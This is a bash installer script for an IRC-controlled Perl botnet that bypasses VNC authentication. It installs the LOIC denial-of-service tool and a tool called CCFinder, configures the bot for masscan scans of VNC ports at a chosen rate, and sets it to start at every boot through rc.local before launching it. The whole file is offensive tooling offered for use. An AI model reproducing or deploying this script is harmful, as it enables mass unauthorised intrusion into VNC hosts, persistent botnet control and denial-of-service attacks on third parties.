#!/bin/bash
clear;
echo "Perl VNC ByPass AUTH IRC Bot with SSL";
echo "Made by independent";
echo 'https://github.com/independentcod/PerlIRCSSL_VNCbypass';
read -p "Install required packages? Y or LEAVE BLANK + ENTER" choice
case $choice in
 Y) if [ -f "/usr/bin/yum" ]; then
    sudo yum install epel-release openssl-devel boost-devel libpcap-devel perl-CPAN* cmake -y;
sudo yum groupinstall "Development Tools" -y;
perl -MCPAN -e install CPAN;
perl -MCPAN -e reload CPAN;
sudo cpanm -fi Digest::MD5;
sudo cpanm -fi Net::SSLeay; 
sudo cpanm -fi IO::Socket::SSL; 
sudo cpanm -fi Time::HiRes;
sudo cpanm -fi Mojolicious; 
sudo cpanm -fi Mojo::IRC;
sudo cpanm -fi Net::Address::IP::Local;
fi
if [ -f "/usr/bin/apt" ]; then
sudo apt-get update;
sudo apt-get install build-essential python3-dev perl libboost-all-dev libssl-dev masscan libpcap-dev cpan-listchanges cmake cpanminus cpanoutdated -y;
perl -MCPAN -e install CPAN;
perl -MCPAN -e reload CPAN;
sudo cpanm -fi Mojo::IRC;
sudo cpanm -fi IO::Socket::SSL;
sudo cpanm -fi Net::Address::IP::Local;
fi
esac
git clone https://github.com/xymostech/loic.git;
cd loic;
make -j8;
cd ..;
sudo mv loic/loic /bin/loic;
sudo chmod +x /bin/loic;
rm -rf loic/;
git clone https://github.com/independentcod/CCFinder;
cd CCFinder/CCFinder-Linux/;
cmake . && make -j8 && sudo make install;
sh bootstrap.sh;
sudo mv ccfinder ../../;
cd ./../;
clear;
read -p "Proceed to bot configurations? Y or LEAVE BLANK + ENTER" choice
case $choice in
 Y)  
if read -p "IRC server:port? " name; then
 sed -i "perlircssl.pl" -e "s/#defineserverhere/server => \'${name}\',/g" "perlircssl.pl"
fi
read -p "Is the IRC port listening over SSL encryption? < 1 / 0 > (1=Yes, 0=No)" ssl
case $ssl in
 0) sed -i "perlircssl.pl" -e "s/#definesslhere/\$irc->tls({insecure => ${ssl}});/g" "perlircssl.pl";;
*) sed -i "perlircssl.pl" -e "s/#definesslhere/\$irc->tls({insecure => 1});/g" "perlircssl.pl";;
esac
if read -p "Bot Nickname Base? (Bawt)" nick; then
 sed -i "perlircssl.pl" -e "s/#definenickhere/nick => \'$nick\'.int(rand(99999)),/g" "perlircssl.pl"
fi
if read -p "Channel to join when connected? (#Hackers)" ch4n; then
 sed -i "perlircssl.pl" -e "s/#definechanhere/my \$channel = \'$ch4n\';/g" "perlircssl.pl"
 sed -i "perlircssl.pl" -e "s/#definenoticechanhere/my \$noticechan = \'@$ch4n\';/g" "perlircssl.pl"
fi
if read -p "Fork timeout in seconds? (Recommended: 10-60)" timeout; then
 sed -i "perlircssl.pl" -e "s/#definetimeouthere/my \$forktimeout = "$timeout";/g" "perlircssl.pl"
fi
if read -p "Maximum number of forks? (Recommended: 50-2000)" m4xfork; then
 sed -i "perlircssl.pl" -e "s/#defineforkshere/my \$maxforks = "$m4xfork";/g" "perlircssl.pl"
fi
if read -p "Define the ports numbers to scan (Recommended:5900 (You can add as many port you want, separated by a space))" ports; then
 sed -i "perlircssl.pl" -e "s|#defineportshere|my @VNC_PORTS = qw/\'$ports\'/;|g" "perlircssl.pl"
fi
if read -p "Masscan RATE-LIMIT/Recommended: 25000" mrate; then
 sed -i "perlircssl.pl" -e "s|--rate 25000|--rate "$mrate"|g" "perlircssl.pl"
fi
sudo mv rc-local.service /etc/systemd/system/rc-local.service;
sudo systemctl enable rc-local;
echo '#!/bin/sh -e' >rc.local;
if [ $USER = "root" ]
then
echo perl /root/PerlIRCSSL_VNCbypass/perlircssl.pl >>rc.local;
else
echo perl /home/$USER/PerlIRCSSL_VNCbypass/perlircssl.pl >>rc.local;
fi
echo exit 0 >>rc.local;
sudo mv rc.local /etc/;
sudo chown $USER /etc/rc.local;
sudo chmod 755 /etc/rc.local;
read -p "In order for bot to work you need to be operator in the channel, it also must be registered with services and YOU MUST autovoice your bots else you will not get any output in the server, ARE YOU READY TO LAUNCH THE PERL SCRIPT??? (Y or LEAVE BLANK + ENTER" choices
case $choices in
 Y) sudo perl perlircssl.pl &;;  
esac
esac
